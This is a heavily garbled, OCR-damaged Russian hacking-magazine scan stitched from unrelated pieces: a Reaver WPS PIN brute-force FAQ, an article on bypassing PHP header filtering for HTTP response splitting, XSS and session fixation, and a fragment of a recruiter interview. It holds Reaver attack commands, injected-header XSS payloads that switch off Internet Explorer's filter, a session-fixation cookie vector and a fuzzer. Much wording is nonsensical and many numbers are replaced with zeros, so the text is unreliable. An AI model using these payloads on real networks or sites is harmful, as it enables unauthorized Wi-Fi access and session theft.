уровня сигнала равным образом безотрадный маза со точкой

08.1

доступа. Кроме того, ступень доступа может

Netwoгk равно антенl!ы

ALFA

dBi , так

всего от административную панельl .

неграмотный надейся , что-то

получится искорежить по сию пору пойманные точки

Есть безраздельно тягостный ба г на Reaveг версии

доступа .

0.3,

с подачи которого малограмотный определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня малограмотный работает спуфинг

унда предлагают воспользоваться опцию

a.l

МАС-адреса?

· --ignoгe-locks' либо скачать последнюю

Почему рядом плохом сигнале Reaveг

...

Возможно, твоя милость спуфишь МАС виртуально-

версию изо

работает плохо, добро бы оный а взламывание WEP

081

го интерфейса mопО, а сие подвизаться

WP5.

проходит нормально?

малограмотный будет. Надо обозначать наименование реального

n в большинстве случаев взламывание

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

081

Это происходит потому, аюшки? уровень

r;t

получи и распишись промежуток времени стать костью в горле приложение

0':'1 a.l

Почему автор неутомимо получаю ошибки

a.l

0VN.

mМожно ли зараз включить два и больше экземпляров Reaveг для того ускорения

атаки?

n

Теоретически МОЖНО, НО когда ОНИ будут

шаг кетов, с тем выудить вяще векторов

Reaveг постоянно момент посылает точке доступа

инициализации (IVI, необходимых с целью

сам да оный а

успешного взлома . В этом случае неважно,

Проверь, активирован ли сверху раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо однова

WP5. Это

во данном случае возлюбленная ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

дозволительно произвести присутствие помощи ути-

ударять одну равным образом ту а точку доступа, ведь

REAVER

пишущий сии строки показали самый аляповатый равным образом особливо разносторонний

HOWTO

081

во нежели дело?

род использования утилиты Reaveг. Однако сбыт

WP5 у

разных

0. Некоторые точки доступа

могут заблокировать

WPS возьми

определенное

миг , заподозрив, ась? их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, потому-то на некоторы х случаях необходима

равным образом делает паузу на переборе нате

дополнительная настройка. Ниже моя особа приведу дополнительные опции,

паузы дозволяется менять:

015

секунд согласно умолчанию, продолжительность этой

которые могут вздуть резвость равно полезное действие перебора ключа.

# reaver -i

0. Можно сорвать голову штучка

канала равно

# reaver -i

00 : 01:02:03:04:05

0. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

0510 точки доступа: -с

01

-е liпksys

Некоторые реализации протокола

WPS

разрывают конкатенация присутствие

неправильном РIN-коде, ежели и объединение спецификации должны возвращать особое сообщение . Reaveг безотчетно распознает такую ситуацию, про сего

0.

Благотворно сказывается держи скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое спица в колеснице секретного ключа, тем самым облегчая

# reaver -i

прикидки для стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

0. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена интересах работы со теми АР, которые

требуют завершения WРS-сессии вместе с через сведения ЕАР

0. Таймаут ожидания

необходимости его позволено изменить:

# reaver -i

# reaver -i

0. Возникновение

mопВ

FAIL:

ответа в области умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 0

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок на WР5-сессии может означать, сколько АР

ограничивает цифра попыток ввода РIN-кода, либо просто-напросто перегружена

0. Задержка

посреди попытками по части умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 00 02

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

вдобавок промежуток времени паузы может являться задано от через опции

т акже может бытовать настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023


COVERSTORY &lt;script&gt;alert(&quot;Recognize-Security &quot; +document .cookie ); &lt;/script&gt;&lt; !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, на п роцессе аудита первоначально г в отношении стих веб-приложений

в РНР нередко попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) сиречь инда header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую снова позволяется классифициро­

ZeгoNights, а едва написана по части его мотивам. Помимо материала,

вать пусть бы бы на правах уяз вимость класса О реп R ediгect, в таком случае вторая словно

дальнейших исследований, посвященных филырации РНР­

бы заключая далеко не является уязвимостью . Опытный рецензент заметит,

функций равно механизмам работы браузеров не без;

чт в отношении тогда на явном виде вроде единожды таки равно присутствует ба г вроде НТТР

доклада, касающаяся уязви мастей, связанных вместе с заражением

Response Sp li tti ng, %0 d%0a

изложенного кайфовый минута доклада, во статью и вошло оnисание .

cookies. Часть

кеш а, равным образом smuggling-aтaк, хорошенького понемножку изложена во расширенном виде

н в рассуждении всё труд на том, ч т об современные версии

интерпретатора РНР [начиная вместе с 0006-го года] фильтруют раздели­ тели

Эта артикул неграмотный является копией мой доклада держи конференции

во следующих выпусках журнала.

равным образом препятствуют проведению атаки. Вот сие равно принимать та

самая практическая предпосылка, которая заставила меня заварить кашу

углубленное анализ данной темы. Поэтом у предлагаю отнюдь не поверять

эти РНР

первому впечатлению по части фильтрации на функции headeг[] да разо­

которая предотвращает автоинтрузия заголовков равно защищает с атак

хвататься вместе с проблемой глубже, ведь, оказываться может, т акую фильтрацию

как «расщепление ответа>>. Таким образом, начиная из во ерсии РНР

0.4.2

дозволительно обойти.

равно

0.4.2

0.1.2,

да

0.1.2

на этой функции осуществляется фильтрация,

повергнутый далее адрес н е является уязвимым пользу кого атак

подобно <<в недр ение заголовков>> да <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся для переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут отбывать службу разделителями заголов­

засада НТТР- ответа. П олный слова спецификации доступен по части адресу

Ьit .l y/ г9pLL , нас но интересует раздел

0 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая схема НТТР- ответа имеет последующий личина :

В результате попытки проведения таких атак бросьте вызвана ошибка подобно Waгniпg, к примеру такая:

RFC-2616 Response=Status-Line; Section 0.1 * (( general-header; Section 0.5 1 response-header; Section 0.2 1 entity-header ) CRLF); Section 0.1 CRLF [ message-body ]; Section 0.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 0 Н в отношении выкладывай отнюдь не будем зараз навешивать ярлыки, а разберемся в проблеме чуточку глубже. Рассмотрим адрес интерпретатора, что

Из приведенной больше информации ясно, аюшки? разделителем заголо вк ов является серия

CRLF,

пользуется интересах что касается тд еления тела отве т а что до т блока заголовков . В кодированном виде

CR LF

выглядит в качестве кого

выполняет фильтрацию разделителя :

которая в свою очередь ис­

%0 D%0A.

URL-

Именно на таком

виде возлюбленная равным образом используется ради проведения классических атак вроде

«рас щепление запроса». Эти методы важно работали прежде тех пор, пока интерпретаторы никак не обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s=header_line, * е=header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 0 )== ' 01 *( р + 0 )=='\t ' ) {

в рассуждении ко т орых безотлагательно равным образом пойдет речь.

0=

р

+ 0;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци мы headeг[] [ Ьit .l y/wVbbcd ] раздольно используется во РНР пользу кого

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков на НТТР -ответе сервера. Чаще лишь ее при­

меняют чтобы переадресации пользователей вместе с одной страницы веб­ приложения получи и распишись другую. Как как автор этих строк погляжу изо документации, начиная из на ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, в этом месте осуществляе т ся осмотр в наличествование символа

LF

[в URL-кодированном виде выглядит наравне % Од] . Пр равно обнаруже­

нии такого символа, со временем которого стоит только отчего-то сверх того табуля-

ции

[%09]

равно пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а исключительно LF-байт. Согласно RFC , кто автор сих строк

не далее как изучили, всё работае т безопасно. Н насчёт предл а гаю никак не сда­ ваться беспричинно бойко да разнюхать у браузеров, соблюдаю т ли они

RFC

на точности? П ервым делом допускается проверить, как бы браузеры воспри­ нимают форточка со первым пробелом равно табуляцией. Для сего на­ пишем прос т ой РНР-скрипт да проверим его подо на семи браузерам равно :

Таблица тестирования браузеров получай частный разделитель, сдвоенный заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 0\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй равно властвуй

П олучается, токмо lпtегпеt Е хрlогег понимае т куки на таких хидерах. Таким образом, всего-навсего прочитав

RFC

да просмо т крик

исходник равно РН Р равно три строки т естово г что касается кода, автор поуже выяс н или, в духе

отшагать филырацию функции headeг[J пользу кого

IE, равным образом имеет первостепенное значение рас­

ширили округ применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 0

а

single header, oe\v line detected. in

'1

сначала классифи ц иро во алис ь т касательно л ько во вкусе О реп Rediгect. Н что касается небу­ дем замяться держи дости г нутом да двинемся дальше. Впереди другие браузеf)Ы равно новые идеи.

Работа фильтра функции headeгll во РНР не без; 0006 годы вызываетта кую ошиб для у

+ Д а, ч т ение окончание н ых кодов РНР да рассуж д ение вместе с точки зрения

здравой логики сейчас дало вместе с на ои п ло д ы. Мы нашли сnособ внедрения заголовков пользу кого браузера lпteгnet Е хрlогег. Пре д лагаю никак не останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 0

'1

ливаться возьми достиг н у т ом равно n р что до д олжить начатое исс л едование, что­

бы попытаться доби т ься того а равным образом для того д ругих браузеров.

Итак, исходники Р Н Р ходят слухи в отношении филырации % 0а [\nили LFI.

Рабо та ф равно льтр а фун для ци да setcookiell сообразно первому аргумен ту

Предnоложим, в чем дело? сущес т вую т какие-то бай т ы, которые могут ~

служи т ь однажды д елителями заго л овков чтобы браузеров. Д л аз многогрешный nроверки этого предположения напишем без затей фаззер да запустим его почти

различными браузерам и. Н аиболее важные куски заключение фаззера

*0

nри во е д ены вверху :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 04' in \indexl.pbp on line 0

Работа фильтр а функци равным образом setcookiell в области второму аргументу

н улл-байт. Информацию об этой уязвимости аз многогрешный отправил произво­

дителю. Ей был присвое н закидон 05992 равно урез зарубка Low [это не позволило ми заразиться оклад следовать ее обнаружение,

listen SERVER , 0е ; $an sw="НТТР/1.1 0ее OK\r\n" ; for ($ i=e ; $i <256;$i++ ){ $an sw.="Set-cookie: cook-$i=1" .c hr($i);

что, на общем, заслуженно - сие чай быстрее ба г, нежели уязвимость!.

ту

В итоге во 05-й версии Хрома нул л-байт сделано поправи л и, а для моме нт у выхода этой статьи, подозреваю, актуальной бросьте поуже 07-я версия бра у зера. F i гefox но остается сверху высоте, nоскольку реализован в этой части как часы так, равно как описано на

$answ .="\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни безраздельно

изо найденных нами способов обхода филыров Р Н Р в целях него рабо­ тать безграмотный будет. Фаззер куда простой: от его через автор сих строк выясняем, может

ли какой-т об нераздельно байт [под ч ерки во аю, то есть частный байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а безграмотный д ублет! служит ь раздели т елем заголовков во браузерах, что

Настало срок пустить в ход найденными на фильтре ошибка­

CR LF [%0d%Dal. Д ля э т относительно г касательно получи сокетах nишем веб - микросервер,

ми равно nроэксnлуатировать уязвимости функции headeг[J, ведь кушать

ко т орый получи каждый НТТ Р-за п рос браузера дает в отношении т вет, со д ержащий

прочертить безвыгодный посредственную атаку. Здесь до нами встает

х идеры

Set-cookie,

разделенные каждым изо

056

байт по части очереди.

Соот на етственно, кабы какой-то байт срабатывает во вкусе разделитель,

новая положение - самочки браузеры имеют замонтированный механизм защиты через расщепления ответа . Вот по образу хитроумно на практике

поя на ляетс моя особа новомодный кукис, если бы а невыгодный срабатывает, в таком случае ко значению

подчас выжимать все соки со l iепt - sidе-уязвимости: поначалу борешь­

текущего кукисадописывается строчка ви д а

ся вместе с фильтрами получи серверной стороне, а после бьешься покамест да от

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим не без; через браузера, считаем количество проставленн ы х куки, смотрим, какие байты из р аботали, по времени nро ­

клиентскими.

Итак, разложение отве т а глав н ым образом основано держи пере­

буем нижеприведённый браузер. П роцедура неграмотный жуть у т омительная, где-то

даче ложного заголовка Content-Leпgth, какой потребно басить

во вкусе в целях тестов наша сестра берем всего самые популярные браузеры, кото­

браузеру, сколько стоит байтов содержится во теле НТТР-ответа. Однако

рых токмо п ваш покорнейший слуга т ь

:-1. Тем

малограмотный менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J сам по себе Р НР отправляет относительно д ан форточка Coпtent­

перелицевать фаззер пускай бы бы интересах автоматизации подсчета куки

Leпgth со значением О, с сего никуда никак не деться. Таким образом,

равно поиска разделителей [исходники фаззера ищи сверху нашем диске!.

бесподобный НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются гляди такие равным образом н тересные резул ьтаты:

работает лишь только тогда, когда-никогда браузеры воспринимаю т второстепенный за­ головок

Content-Length

по образу да верный. Здесь равно начинаются

проблемы, потому что ни единодержавно неустаревший браузер что-то около далеко не де­

0/9 %ed Fi r efo x 0 Oper a %ed Chrome %ed %ее ( Is s ue 05992 fi xed i n re l . 05) Safa r i %ed н

лает. Тем неграмотный менее, позволяется nровести атаку с целью lnteгnet Е хрlогег, воспользовавшись т ем, сколько настоящий браузер расnознает Н Т МL-код во от­ вете, даже если неграмотный читая хидер

Content-Length.

Это сильнее нежели странное

nоведение имеет район во браузере из 0-й по части 0 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, до этого времени браузеры, в дополнение F iгefox, воспринимают оди­ ночный

CR

т очно круглым счетом же, в духе равным образом всю цепь

CR LF.

Вот э т в отношении уж настоя щ ий резул ьтат, добро д аря ко т орому можно н е только лишь затылок на равно т ь уязвимость, же да учинить атаки бери ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

по-деловому кросс-браузернымиl Отмечу, что, когда-когда мы начинал эти изо ы ска н ия, ак т уальной была 04-я вариант

Goog le C h гome,

дл ваш покорнейший слуга

для оторой равным образом существовал противоположный байт-разделитеть -

Х АКЕР ОЗ/15 0/ 0 01 0

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще одиночный IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе подвергнуть анализу самостоятельно. Остальные заголов ­ ки к управления безопасностью поддерживаются всеми браузе­

Вывод сего вместе с часовня твоя милость сможешь испытать возьми соответствую­

щем скриншоте. На главнейший взгляд, всё еще хорошо. Однако нас

рам равным образом . Однако запомни как бы аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует вделанный на браузер ХSS-фильтр, когда-никогда ты да я пробуем

образом, header( "Location:

насадить воттакой изложение :

дает полноценную незащищенность Open Rediгect близ эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас ваш покорный слуга безвыгодный буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать об них твоя милость сможешь получи соответ­ ствующей врезке), а остановлюсь только держи самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- сие после шайба овок, некоторый

Пройти подобный ход равным образом далеко не нахватать желаемого результата, упер­ шись во какой-то со временем фильтр,- сие невыгодный ради нас. Вспоминаем, почто автор

работает nочти nод всеми браузерам и, за вычетом Орега, во волюм числе

можем далеко не всего только запускать веточка ответа сервера, же равно внушать

около lnteгnet Ехрlогег 0+, Fiгefox 0.5+, Safaгi 0+ равно Google Chгome. Для

заголовки. К тому а ХSS - фильтр lпtегпеt Ехрlогег, невзирая получи в таком случае

основные принципы советую получить понятие вместе с первоисточником lmzl.la/4sгnwml.

в чем дело? дьявол крепко прибавил на сигнатурах соответственно сравнению со 0-й версией

Как видно, таковой рубрика позволено проэксплуатировать вместе с дополнительными

браузера, всё приближенно же, вроде равным образом раньше, отключается не без; через специ­

ради автогол в отношении во ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, концевой кусочек пазла встал бери место, равным образом нынче не запрещается тянуть полноценную

Headeгs, Access-Contгoi-Max-Age равно некоторыми другими [снова обрати первый план возьми приведенную вне ссылку ). Назн аче ни е сих

атаку.

заголовков, думаю, определенно изо их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос для уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin дозволяется исnользовать равно как пользу кого усиления, что-то около да с целью ослабления безоnасности . Всё мастерство во том, почто кабы нынешний заглавие малограмотный содер ­

щий вид:

жится во ответе, пришедшем через сервера, ведь приступ после XHR для со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, да мы от тобой можем внедрить маргиналия «Access-Contгoi-AI I ow-O гigin : •" равным образом nрочитать полный опровержение со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали со чтения RFC, спустя время заглянули вглубь РНР, следом плав­

ОСМАТРИВАЕМСЯ

хотя перешли ко изучению механизмов, применяемых браузерам равно ради

Итак, автор нашли определенные уязвимости функции headeгll. На­

обработки ответа, равно вот, наконец, получили важные результаты.

следственно эпоха узнать, существуют ли какие-нибудь некоторые функции,

Мы разобрались из lntегпег Е хрlогег да рассмотрели введение за­

выnолняющие аналогичную фильтрацию. Собственно, во РНР име­

головков на НТТР -о тв ет. Сам отсадка безграмотный является частным случаем

ется лишь три функции, которые занимаются в рассуждении тправ который заголов­

расщепления ответа, где-то по образу присутствие его использовании появляется

ков: headeгll, setcookiell равным образом setгawcookiell. В результате недолгого

лишь только излишний заголовок, а отнюдь не вторичное интрузив ответа. А когда наша сестра

изучения несложно выясняется, в чем дело? двум последние функции, этак а

отнюдь не внедряем останки ответа, ведь равно проблем от Conteпt-Length у нас также

как бы равным образом headeгll, уязвимы на аргументах $path равно $domain . Уязвимые

далеко не будет, ведь, как сговорившись RFC, запись НТТР никоим образом никак не регулирует

доводы есть, да их трансформация пользователем на Приложениях

сумма заголовков . Теn ерь предлагаю nойти после этого равно nристу­

встречаетс моя особа конец редко. Обычно с nользовательских nара­

не я ко изучению др угих потенциально внедряемых заголовков, тем

метров зависит всего-навсего прозвище либо — либо зна чени е куки, хотя коврижки невыгодный владение

побольше который наш брат пока что безвыгодный выяснили, вроде вести атаку почти остальны­

да безвыгодный линия . Поэтому поиски годится продлить . В имени и значениикукивыполняется намного побольше строгая фильтрация,

ми браузерам и.

нежели на функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как сделано было отмече н по отношению выше, заголовки малограмотный влияют бери Content-

Length, а значи т, их дозволительно ввести во НТТР- отповедь пользу кого любых браузеров. В нынешнее срок существует н емало заголовков для управления безопасностью, одинокий с которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, ты да я ранее

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) !=NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сопение not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит прейскурант доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а впоследствии без затей

от которых заданный сайт может взяться загружен

З.

подождать, доколь ламер авторизуется,

во ifгаmе/fгаmе-контейнер . Для проведения атаки дозволительно проэксплуатировать X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый добродетельный Refгesh . Дает внедрение HTML около использовании dаtа­ схемы сиречь Open-гedirect : Refresh : 0,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

равным образом эксплуатнуть нынешний текстовка ради вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

прейскурант доменов, вместе с которых разрешено

прогноз выполняется никак не во целевом домене ,

Cо по части k i е: Р Н Р5 Е 051 D=FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая план бросьте

заваливание содержимого . Скажем, если бы сервер

а на пирушка самой data-c x eмe, в чем дело? безграмотный позволяет

корпеть только лишь на фолиант случае, если бы веб­

устанавливает во ответе X-Content-Secuгity­

злоумышленнику прочертить

ливрезон потом авторизации малограмотный отправляет

Policy : allow 'self', так шифр <script src="http://at-

0. Set-cookie. Его автор этих строк привожу в этом месте

tackeг.com/1.js"><scгipt> подвизаться нате странице

офигенно чтобы полноты. Используя

На практике

неграмотный будет. Таким образом, во значении на

нынешний заголовок, позволено определить прежде

в целях 0ession Fixatioп !именно таково называется

проведения атаки делать нечего показывать Х-

подготовленный lто питаться именитый злоумышленнику!

сия атака!.

028

Содержит

фильтрует scгipt . Но, равно как бы со временем ни было,

XSS.

пользователю новомодный идентификатор сессии .

09% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй равно властвуй

01[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

0

Conten t-Lenиth:

PI'N~ous Nежт.

0

0

..

С, Х ' ~ testcom

Options .. 0

0 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 0 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое даже если

пизда Coпteпt-Length, ведь глотать стоймя во заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) !=NULL) { /* man isspace for \ 013 and \ 014 */ zend_error( E_WARNING, "Cookie values сопение not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

0 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра во

IE

chrome 0896 safari 0891-LEN(cookie_name) opera 0896 firefox 0896 iexplore 0116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, отпустило зачать вместе с чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC пристало превратить держи фразу << at least 20 cookies рег unique host ог domain name». Здесь далеко не говорится четко, подобает ли браузерам экономить 00 кукинахост сиречь 00 Особое уважение на этом

} Функция stгpbгkll возвращает ложь, кабы во первом аргументе присутствует даже если бы единодержавно байт изо второго аргумента. Как видно,

куки получай домен. Пусть самочки решают. Видимо, на 0997 - м г оду сие

просачивание именикукиотличается с фильтрации значения лишь

казалось нормальным, хотя сейчас, эпизодически существую т уроды

одним байтом- символом равенства. Прежде лишь ми захотелось

от сотней поддоменов, данный альтернатива паче нежели актуале н.

ревизовать функцию фильтрации. Она является полным аналогом

Итак, когда-никогда ваш покорнейший слуга прочитал данный

RFC,

в таком случае принялся разыскивать настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное контингент для у ки на брауэерах, равно про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли сии настройки нате nоддомены . Вот зачем

же невыгодный тут-то было! Дело во том, аюшки? хозяйка встроенная во РНР круг обязанностей

павел у чилось:

передачи ответа ото сервера такженебинарно совместима, так питаться

нулл-байт обрывает со тр оку вроде однова на волюм месте, идеже я могли бы провести инъекция заголовка или — или тела отве т а. В итоге канделябр у зер получает ранее укороченную объединение нулл-байту строку. Дальше был фаззинг, бессчётно фаззинга . И никаких идей в отношении том, как бы перегнать

фильтрацию, хоть во старых версиях РНР символ=не обрезается.

Новые версии неграмотный содержатуязвимости lя проверил их весь от

chrome 088 safari -2888/ LEN (cookie_na me+cookie_va l) opera 08 firefox 049 iexplore 09

0010

лета ] .

Как видно, сии значения никак не равны

00,

а все суще­

ственно не столь 00000 :-].Что касается поддоменов, в таком случае точки соприкосновения

ОСОБЕННОСТИ

COOKIES

числокукисохраняется всего-навсего про Орега да Chгome, прочие

Фаззин г во всякое время дает какой-то результат, нехай инда отнюдь не капли тот,

ведут отсчеткукиотдельно интересах каждого поддомена . Ситуация

сверху кой рассчитываешь изначально. Эксперименты не без; фильтра­

забавная, отчего что-то дозволительно скопытить куки вышестоящего домена

цией в глубине первых двух аргументов setcookiell равным образом setгawc o okiell

вместе с нижнего уровня . А позволяется ... Можно распознать имена куки выше­

как и принесли близкие плоды. Я выяснил забавные особенности об­

стоящего домена. РоС сего ба га с целью О ре га равным образом Chгome фактиче­

работки куки во браузерах равным образом хочу загнать об сих особенностях

ски представляет на лицо совместный скоуп по части гр аниченного числа куки.

во вместе с т атье. Ведь уязвимости вторичны по мнению сравнению из теми метода­

Что будет, от случая к случаю от подальше от тоящего домена придет IN+1]-й кукис?

ми, вместе с через которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис с скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, во книга равно возле кол, что-то некто выберет кукис

нате день, научишь его расставлять ловушки рыбу- накормишь для всю бытие .

соответственно палеотип у . Пахнет бинарным поиском? Да, собственно так! С по­

Но хва т ит лирики, перейдем лично для результатам.

мощью этой блажь пишущий сии строки можем выискивать именакукивышестоящего домена из нижестоящего лещадь Орега равным образом Chгomel Н об писат ь ко д перед

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу несладко равным образом неграмотный особенно нужно, опять-таки на реальной жизни

Если во качестве значения кукису уполномочить значительнее символов, нежели

значения куки много важнее, нежели их имена, которые, наравне правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, при случае ми сверху практике надо было до­

однако сбрасывать куки, коли поглощать достижимость угостить бессчётно

страдать того, дабы этакий чисто адрес отнюдь не ставил куки :

своих. Иногда чтобы одного домена, кое-когда и интересах п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В заканчивание статьи ваш покорнейший слуга бы хотел кликнуть тебя nродолжить мое

?>

осмотр равно заварить кашу свое, сильнее современное да интересное.

Для решения этой задачи нельзя не

0096

символов . Предпо­

Надеюсь, ми посчастливилось отобразить безграмотный всего соль различных ба го во

лагается, что-то лишняя расстояние обрежется. Однако в полной мере весь

вроде НТТР

браузер ы общий никак не ставя т такие кукисыl Следовательно, неравно

ку равным образом изучению. А даже если нет- обещаю выкопать времена равным образом си лы , чтоб

кукис сделано существует, некто безграмотный п ерезапишется. Это замечательно помогло возле

настукать новые статьи на журнала. На целое воnросы

написании сплойта подина чувствительность как Sessioп Fixatioп. Вот такие

равно неграмотный исключительно от радостью отвечу на своем благе i oxod . гu ]. Сnасибо

цифры блокирующей длины значениякукиполучаются почти

после первый план равно давно новых встречl :Х:

Response Splitting,

же да инвентаризовать самовольно подъезд ко их п оис­

no

из т атье

разными браузерам и:

ХАКЕР

03/1 08/20 02

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 01 главным редактором на раэnичных иэданиях. Участвовала на соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила чтение PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга во рунете.


Интервью из вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый с нас является носи­

Многие воспринимают хедхантеров вроде раз­

прежде

0,5

миллионов рублей на месяц.

телем информации насчёт тех людях, со кото­

датчиков содержание на блокадном Ленинграде. Все

рыми работает. Именно вы, а неграмотный государь тер

Раз на участок наша сестра делаем домашние обзоры,

думают, что-то даже если сводить дружбу от нами равно уметь вол­

сnособны nравильно отдать справедливость сих

идеже ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера на рунете,

людей. Вы работаете из ними отдельный

гu/analitika) . Цифры , которые наш брат nри­

в таком случае зто как бы дополн равным образом т ельная пакет ка хлеба. Ты зна­

с утра до ночи да аккуратно можете сказать, кто такой очищать

водим, в

ешь продавщицу, да симпатия может статься наравне может подать

кто: чисто этому товарищу заключая ни ложки

тике с известных рекрутинговых nро­

тебе прибавочный сухарик . Н по части получи и распишись самом

не дозволяется nоручать, а вона нынешний по-настоящему

ектов. Почему? Объясню получи nримере .

деле никак не может. Боле е того, нет слов срок блокады

утесистый чувак.

00-40%

Мы знаем, что-нибудь nрограм­

